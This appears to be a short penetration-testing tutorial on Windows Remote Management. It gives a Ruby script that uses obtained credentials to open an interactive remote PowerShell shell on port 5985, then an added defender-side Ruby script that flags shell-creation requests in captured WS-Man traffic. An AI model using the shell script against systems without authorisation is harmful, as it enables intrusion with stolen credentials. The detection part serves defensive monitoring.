Windows Remote Management (WinRM) is a Windows-native, built-in remote management protocol; in its simplest form it uses the Simple Object Access Protocol (SOAP) to interface with remote computers and servers, as well as operating systems and applications. Source: link
If you have obtained WinRM credentials and can reach port 5985 (the /wsman endpoint), you can use the PoC below to obtain a PowerShell shell.
The default HTTP port for WinRM is 5985.
Install the winrm gem with gem install winrm, then save the following script as winrm_shell.rb:

require 'winrm'

# Connection details for the target WinRM listener (plain HTTP on 5985/wsman).
conn = WinRM::Connection.new(
  endpoint: 'http://192.168.78.185:5985/wsman',
  user: 'administrator',
  password: 'administrator123',
)

command = ""
conn.shell(:powershell) do |shell|
  # Read commands from stdin and run each one in the remote PowerShell session
  # until the user types "exit" (which is also sent to the remote shell).
  until command == "exit\n" do
    print "PS > "
    command = gets
    break if command.nil?   # stdin closed (Ctrl-D): leave the loop cleanly
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end
Run the Ruby script to obtain the shell. Make sure the winrm gem is installed before running the PoC above.
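As an added defender-side example (not part of the original PoC or the winrm gem): a Ruby script that classifies captured WS-Man SOAP requests posted to /wsman and reports which clients created remote shells, which is the request the PoC above sends when it opens its PowerShell session. The envelopes and client addresses are constructed sample data; the action and resource URIs are the standard WS-Transfer Create action and the PowerShell and cmd shell resource URIs.

```ruby
# Added example, not part of the original PoC: classify captured WS-Man SOAP
# requests (as posted to /wsman) and report which clients created remote shells.
# Envelopes and client addresses below are constructed sample data.
# WS-Transfer Create action a client sends to open a new remote shell, and the
# resource URIs of the two shell types WinRM offers.
CREATE_ACTION = 'http://schemas.xmlsoap.org/ws/2004/09/transfer/Create'.freeze
SHELL_RESOURCES = {
  'http://schemas.microsoft.com/powershell/Microsoft.PowerShell' => 'powershell',
  'http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd'  => 'cmd'
}.freeze

# Pull the Action and ResourceURI SOAP headers out of an envelope. A regex is
# enough for these minimal samples; real captures should go through an XML parser.
def wsman_headers(envelope)
  { action:   envelope[%r{<(?:\w+:)?Action[^>]*>\s*([^<\s]+)\s*</(?:\w+:)?Action>}, 1],
    resource: envelope[%r{<(?:\w+:)?ResourceURI[^>]*>\s*([^<\s]+)\s*</(?:\w+:)?ResourceURI>}, 1] }
end

# Returns 'powershell' or 'cmd' when the request creates a shell, otherwise nil.
def shell_creation(envelope)
  h = wsman_headers(envelope)
  h[:action] == CREATE_ACTION ? SHELL_RESOURCES[h[:resource]] : nil
end

# Group shell creations by client address so repeated sessions stand out.
def shell_creations_by_client(requests)
  requests.each_with_object(Hash.new { |h, k| h[k] = [] }) do |req, acc|
    kind = shell_creation(req[:body])
    acc[req[:client]] << kind if kind
  end
end

# Minimal WS-Man envelope builder used only to produce the constructed samples.
def envelope(action, resource)
  "<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"><s:Header>" \
  "<a:Action s:mustUnderstand=\"true\">#{action}</a:Action>" \
  "<w:ResourceURI>#{resource}</w:ResourceURI></s:Header><s:Body/></s:Envelope>"
end
ENUMERATE = 'http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate'.freeze
SAMPLE_REQUESTS = [
  { client: '10.0.0.5', body: envelope(CREATE_ACTION, SHELL_RESOURCES.keys[0]) },
  { client: '10.0.0.5', body: envelope(ENUMERATE, 'http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*') },
  { client: '10.0.0.9', body: envelope(CREATE_ACTION, SHELL_RESOURCES.keys[1]) },
  { client: '10.0.0.5', body: envelope(CREATE_ACTION, SHELL_RESOURCES.keys[0]) }
].freeze

shell_creations_by_client(SAMPLE_REQUESTS).each do |client, kinds|
  puts "#{client}: #{kinds.size} shell creation(s): #{kinds.uniq.join(', ')}"
end
```

Enumerate and other non-Create requests are ignored, so the report lists only clients that actually opened a remote shell and how many times.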